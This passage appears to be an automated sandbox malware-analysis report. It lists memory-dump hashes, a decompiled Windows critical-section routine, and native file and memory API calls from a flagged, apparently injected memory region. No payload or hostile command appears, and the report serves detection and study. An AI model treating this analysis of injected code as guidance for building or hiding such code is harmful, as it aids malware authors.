                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                      • Instruction ID: c6d00db1dba76795bebb90b14913ff81ba2efa7ad9729782fb17b5b8621dae64
                                                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                      • Instruction Fuzzy Hash: 5DE0DF32A41118FBDB21AAD99E09FAAFFBCDB58E60F000196FA08D7550D6719E00D3D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df103395259ee9c90af7e0e524ae95d967877fa6197667e74e3c1d34e7bb405a
                                                                                      • Instruction ID: 499ddb31411eff351b04155caceaee324f49f81bc0a425e57b98b5c52bb9ae55
                                                                                      • Opcode Fuzzy Hash: df103395259ee9c90af7e0e524ae95d967877fa6197667e74e3c1d34e7bb405a
                                                                                      • Instruction Fuzzy Hash: 6FE026B0209206EFDB36DB59E044F29FBAEDF52F31F19805DF0084B102C621DA80C28A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b884da8ec41a57a7fcb76700ba763d4d22243b545a6762c6d84b82e117c2fe3
                                                                                      • Instruction ID: 63bbf425fe7a556ad708091f0ace590d528df20bc0988d302a04942585dea232
                                                                                      • Opcode Fuzzy Hash: 5b884da8ec41a57a7fcb76700ba763d4d22243b545a6762c6d84b82e117c2fe3
                                                                                      • Instruction Fuzzy Hash: C290027120140802D14161D94C087470005A7D1342F51C111A6158669EC6E5C9957571
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bfbdefa903cce941fc7ef18abf6b27cdbd29c980fdb2a699604657d0ab34154b
                                                                                      • Instruction ID: 9f21532b35c7e2ba38d17b50a42280a07efc76843e5582fd9bfc06a59280076d
                                                                                      • Opcode Fuzzy Hash: bfbdefa903cce941fc7ef18abf6b27cdbd29c980fdb2a699604657d0ab34154b
                                                                                      • Instruction Fuzzy Hash: 5290026120144842D18162D94C04B0F4105A7E2342F91C119A514A668CC99589596761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 55e43c02eda06fb7f8eed06eaded5e71b01cd5bf0c9194fcfbe6365e1313575d
                                                                                      • Instruction ID: b25a2867ccdb191ee79677fc0fcc9aaf7e67ced31bc28da75ac9d5b3fb1c2012
                                                                                      • Opcode Fuzzy Hash: 55e43c02eda06fb7f8eed06eaded5e71b01cd5bf0c9194fcfbe6365e1313575d
                                                                                      • Instruction Fuzzy Hash: E3900265221004020186A5D90A0450B0445B7D7391391C115F240A6A4CC6A189696361
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 25f0ccee7a0046d850e4b71c59ee165b2838e57c755a3c12da030e0341ddfd8a
                                                                                      • Instruction ID: 96993ba15864f25c902fdea377da380a730a61ccf1d11a6c53343eacfa54a74f
                                                                                      • Opcode Fuzzy Hash: 25f0ccee7a0046d850e4b71c59ee165b2838e57c755a3c12da030e0341ddfd8a
                                                                                      • Instruction Fuzzy Hash: AA900271A0500412918171D94C146464006B7E1781B55C111A1508668CC9D48B5963E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6727f55a68a20dae942148c1e9fdc2b186b1403fac23511e688f4eb89ccd2a95
                                                                                      • Instruction ID: 19e27ff38bcd4a306996e07128db652a4629f8b3883c4574889eda807f5cfc82
                                                                                      • Opcode Fuzzy Hash: 6727f55a68a20dae942148c1e9fdc2b186b1403fac23511e688f4eb89ccd2a95
                                                                                      • Instruction Fuzzy Hash: E69002E1201144924541A2D98804B0A4505A7E1341B51C116E2048674CC5A58955A175
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c29601dd9b811034ba8e7a2528dfdea6f78f8bcd245d0e9faa4ea58ebbea5230
                                                                                      • Instruction ID: c6ecf9d13c81120b787a44b9e71723fbd2bb17f549a98b61e3786749fd39f6a5
                                                                                      • Opcode Fuzzy Hash: c29601dd9b811034ba8e7a2528dfdea6f78f8bcd245d0e9faa4ea58ebbea5230
                                                                                      • Instruction Fuzzy Hash: 3B90027120100C02D14561D94C046860005A7D1341F51C111A7018769ED6E589957171
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f34f70f3e36a762367dc88d593b3234d7bdf5e01c29231490affd1e0af200758
                                                                                      • Instruction ID: 957ac6ab6717bf2aa4286e62c4e07a3f12a0cc1bf345c69a08090c68a6216a3a
                                                                                      • Opcode Fuzzy Hash: f34f70f3e36a762367dc88d593b3234d7bdf5e01c29231490affd1e0af200758
                                                                                      • Instruction Fuzzy Hash: 9890027520504842D54165D95C04A870005A7D1345F51D511A14186ACDC6D48965B161
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 445a2d3a064a5ab81893af9f7d4189c341b126ee7ba806fa1bbd84bfb88b4dff
                                                                                      • Instruction ID: a37221f84f2dc0876abb0292362822ecadc01f9994713c373ab9641b495b6042
                                                                                      • Opcode Fuzzy Hash: 445a2d3a064a5ab81893af9f7d4189c341b126ee7ba806fa1bbd84bfb88b4dff
                                                                                      • Instruction Fuzzy Hash: 2390026120504842D14165D95808A060005A7D1345F51D111A20586A9DC6B58955B171
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5db44e7e8e942bee00d1c05058fb6d121e6ef6eb899eaef435aa08c8dbc0b0ef
                                                                                      • Instruction ID: 57838238ff34561b94b9469d115b03d484c91243f137183d8943ca625cc91231
                                                                                      • Opcode Fuzzy Hash: 5db44e7e8e942bee00d1c05058fb6d121e6ef6eb899eaef435aa08c8dbc0b0ef
                                                                                      • Instruction Fuzzy Hash: 2B90027120100803D14161D959087070005A7D1341F51D511A141866CDD6D689557161
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f90ad0c53587a3c34d1d2b8bc0975bbd7af4caf6770ab476e233e13e634ab927
                                                                                      • Instruction ID: 9dd6aec76efd04d26478cd3f87cbc380d8cce5d8cb63485e6a1e529253827931
                                                                                      • Opcode Fuzzy Hash: f90ad0c53587a3c34d1d2b8bc0975bbd7af4caf6770ab476e233e13e634ab927
                                                                                      • Instruction Fuzzy Hash: EA90026160500802D18171D958187060015A7D1341F51D111A1018668DC6D98B5976E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ba11fd2a49587da7da9fa382bd360b3a3ac3fdc097349f2d5cd2169e7677113
                                                                                      • Instruction ID: 2910ce0e91e4916f56dadba8c0cd6d193594c50cf7a288927583497afba038d1
                                                                                      • Opcode Fuzzy Hash: 2ba11fd2a49587da7da9fa382bd360b3a3ac3fdc097349f2d5cd2169e7677113
                                                                                      • Instruction Fuzzy Hash: 2B900271301004529541A6D95C04A4A4105A7F1341B51D115A5008668CC5D489656161
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c289ecef04f47df4adb3bb146ec10224701f05c2b3780972bab3892b5acb63ad
                                                                                      • Instruction ID: 06e6aa12149d8b94b4ca79168d3ede601f7de6d72edd8327bdf0d5063b9f6142
                                                                                      • Opcode Fuzzy Hash: c289ecef04f47df4adb3bb146ec10224701f05c2b3780972bab3892b5acb63ad
                                                                                      • Instruction Fuzzy Hash: BD90027120504C42D18171D94804A460015A7D1345F51C111A10587A8DD6A58E59B6A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc137c731717042984115b28b04f74e6c25f571f5c387d1fab09340ec6acaf72
                                                                                      • Instruction ID: 1ad6b04abf920353d9f957f1ddc65f66c690f324795b43f6c7594d6188aec81d
                                                                                      • Opcode Fuzzy Hash: dc137c731717042984115b28b04f74e6c25f571f5c387d1fab09340ec6acaf72
                                                                                      • Instruction Fuzzy Hash: 7690027160500C02D19171D948147460005A7D1341F51C111A1018768DC7D58B5976E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc03379d322af38251d67ad4d5c50e6838d2ed435b812b8a25bf896086de8bb6
                                                                                      • Instruction ID: f8e45f50eab1b0957d0be45defb322e4eacdbf3e35e9a88ec3ae84743fad5015
                                                                                      • Opcode Fuzzy Hash: bc03379d322af38251d67ad4d5c50e6838d2ed435b812b8a25bf896086de8bb6
                                                                                      • Instruction Fuzzy Hash: 2E90027120100C42D14161D94804B460005A7E1341F51C116A1118768DC695C9557561
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction ID: 5cdb17cc779140ae7e0192c9878fae53c3bdc3ad0732124b1fec5f231db976cc
                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 53%
                                                                                      			E0184FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                      				void* _t7;
                                                                                      				intOrPtr _t9;
                                                                                      				intOrPtr _t10;
                                                                                      				intOrPtr* _t12;
                                                                                      				intOrPtr* _t13;
                                                                                      				intOrPtr _t14;
                                                                                      				intOrPtr* _t15;
                                                                                      
                                                                                      				_t13 = __edx;
                                                                                      				_push(_a4);
                                                                                      				_t14 =  *[fs:0x18];
                                                                                      				_t15 = _t12;
                                                                                      				_t7 = E017FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                      				_push(_t13);
                                                                                      				E01845720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                      				_t9 =  *_t15;
                                                                                      				if(_t9 == 0xffffffff) {
                                                                                      					_t10 = 0;
                                                                                      				} else {
                                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                      				}
                                                                                      				_push(_t10);
                                                                                      				_push(_t15);
                                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                      				return E01845720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                      			}











                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0184FDFA
                                                                                      Strings
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0184FE2B
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0184FE01
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                      • API String ID: 885266447-3903918235
                                                                                      • Opcode ID: a980c72ddede3f83bc99f85ece16d71c3fee65704592ae28411907e4cf7f4e94
                                                                                      • Instruction ID: 361380d4daae757f5f13a934d12f33ac62f3ea2cafcd5c4eac87f473b339d7b1
                                                                                      • Opcode Fuzzy Hash: a980c72ddede3f83bc99f85ece16d71c3fee65704592ae28411907e4cf7f4e94
                                                                                      • Instruction Fuzzy Hash: E1F0F672240205BFE6201A49DC06F23BF5AEB84B30F140318F7289A5E1EE62F92086F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Executed Functions

                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02CD3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CD3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02CD81FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID: .z`
                                                                                      • API String ID: 823142352-1441809116
                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                      • Instruction ID: d980a7bbaa09477f7f79115161a49cc4fc774bc668d88bf8e5d3c7babfeaf98c
                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                      • Instruction Fuzzy Hash: BFF0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630F8118BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02CD3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CD3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02CD81FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID: .z`
                                                                                      • API String ID: 823142352-1441809116
                                                                                      • Opcode ID: cb2f07bbc838fb6c36a7f6924397f3b70995901d3015c204cbd7a78785e85a2d
                                                                                      • Instruction ID: 4a8f844e0a1e2cd96caab3fe1fb703746cd463ae0b0373bb18915bc9501e1aa3
                                                                                      • Opcode Fuzzy Hash: cb2f07bbc838fb6c36a7f6924397f3b70995901d3015c204cbd7a78785e85a2d
                                                                                      • Instruction Fuzzy Hash: B6F0CFB2214149ABCB08CF98D884CEB77A9FF8C754B15864DFA1DA3202D634E8558BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(02CD3D42,5E972F59,FFFFFFFF,02CD3A01,?,?,02CD3D42,?,02CD3A01,FFFFFFFF,5E972F59,02CD3D42,?,00000000), ref: 02CD82A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: bbb951c9e17c43aa3d8db519a6691c5dc01069bcba90a1153b14edfd27066279
                                                                                      • Instruction ID: 71d0bc3bef23d4b36ce619119921122d8ee90aced69a378cc0a22c2a6e919462
                                                                                      • Opcode Fuzzy Hash: bbb951c9e17c43aa3d8db519a6691c5dc01069bcba90a1153b14edfd27066279
                                                                                      • Instruction Fuzzy Hash: 55F0B7B6200105AFCB14DF99DC90EEB77A9EF8C714F158649BA1DA7241DA30E851CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(02CD3D42,5E972F59,FFFFFFFF,02CD3A01,?,?,02CD3D42,?,02CD3A01,FFFFFFFF,5E972F59,02CD3D42,?,00000000), ref: 02CD82A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                      • Instruction ID: 5d2f7a5080f815baed305b6963e18c7edc84b6401cfcd292b2b019c84ee844e4
                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                      • Instruction Fuzzy Hash: 6DF0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02CC2D11,00002000,00003000,00000004), ref: 02CD83C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2167126740-0
                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                      • Instruction ID: 283d52849d1ca7047b3909550dec47c8b5b9adb61491d53b7ecd7f81f31dde4f
                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                      • Instruction Fuzzy Hash: CFF015B2200208ABCB14DF89CC80EEB77ADAF88750F118248BE0897241C630F811CBE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtClose.NTDLL(02CD3D20,?,?,02CD3D20,00000000,FFFFFFFF), ref: 02CD8305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                      • Instruction ID: eb36f19719f65910efeb56e26276eb1035409a0fb9b3037771891b8009ae5e32
                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                      • Instruction Fuzzy Hash: 44D012752002146BD710EF98CC45EE7776DEF44750F154555BA185B241C530F90086E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtClose.NTDLL(02CD3D20,?,?,02CD3D20,00000000,FFFFFFFF), ref: 02CD8305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
                                                                                      • Instruction ID: a995bc1082efd5a399d84a88f669f1572868b6cfa0531cef0f4454b52c17a24c
                                                                                      • Opcode Fuzzy Hash: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
                                                                                      • Instruction Fuzzy Hash: B3D01776200210ABDB10EFA8CC84EE77B69EF48760F154599BA1C9B281C530EA018AE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c0f34281e1bb709f2667ca10b7e403f72bb3c151e568576a0bf2c49c76a93216
                                                                                      • Instruction ID: 81e84a742d749fa25196d8af3621902e1eb083b777b068a27db05d31e77f6fb1
                                                                                      • Opcode Fuzzy Hash: c0f34281e1bb709f2667ca10b7e403f72bb3c151e568576a0bf2c49c76a93216
                                                                                      • Instruction Fuzzy Hash: 73900265251000072205A59907045070096A7D5395351C035F100A590CD661D8657161
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7925f22987c59b79f5beb83b845af354a370f01dd628ae616c4afcdcb127bc79
                                                                                      • Instruction ID: 002ffdd6380582a711f861f84afcdad7b38acb15848af019b56e187221d99d2d
                                                                                      • Opcode Fuzzy Hash: 7925f22987c59b79f5beb83b845af354a370f01dd628ae616c4afcdcb127bc79
                                                                                      • Instruction Fuzzy Hash: 939002A124200007620571994414616405AA7E0245B51C035E10095D0DC565D8957165
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 22a423d31eac3375c7b666d57770036050fa42e1739d50178ecb2813bec80658
                                                                                      • Instruction ID: 7dfeb3f8a6284a50aadc4d272b6b1d23b9b50624e87661fb89c4c8606c7b2929
                                                                                      • Opcode Fuzzy Hash: 22a423d31eac3375c7b666d57770036050fa42e1739d50178ecb2813bec80658
                                                                                      • Instruction Fuzzy Hash: 2E90027124504846F24071994404A460065A7D0349F51C025A00596D4D9665DD59B6A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 9a6f8c90799a59b660d498b3cc6e7408c45fe8ad4cd7bd88625c09d4ffed1791
                                                                                      • Instruction ID: 5819abf1ac8acd57eb8f7acc1a17356c0d5f9e6c996837aea1a1133335603c4b
                                                                                      • Opcode Fuzzy Hash: 9a6f8c90799a59b660d498b3cc6e7408c45fe8ad4cd7bd88625c09d4ffed1791
                                                                                      • Instruction Fuzzy Hash: AD90027124100806F2807199440464A0055A7D1345F91C029A001A694DCA55DA5D77E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 5f2d1db72cddd664c6cd346c21d83f0b94f8156c90bc7f3a75f36048c7b6e92e
                                                                                      • Instruction ID: b64bee95d55f2696326cba27156c1ee4ad748dc94ed9264661870ac033cbc19e
                                                                                      • Opcode Fuzzy Hash: 5f2d1db72cddd664c6cd346c21d83f0b94f8156c90bc7f3a75f36048c7b6e92e
                                                                                      • Instruction Fuzzy Hash: CA90027124100846F20061994404B460055A7E0345F51C02AA0119694D8655D8557561
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 31718dc635ed0f4fd56509f525015eef95265a36728f9783c2e0ef4ffec781f7
                                                                                      • Instruction ID: 1e9a834c76b2ebfe26a435a8262ca52eeca33845f086e54c72cf6263a7bf6934
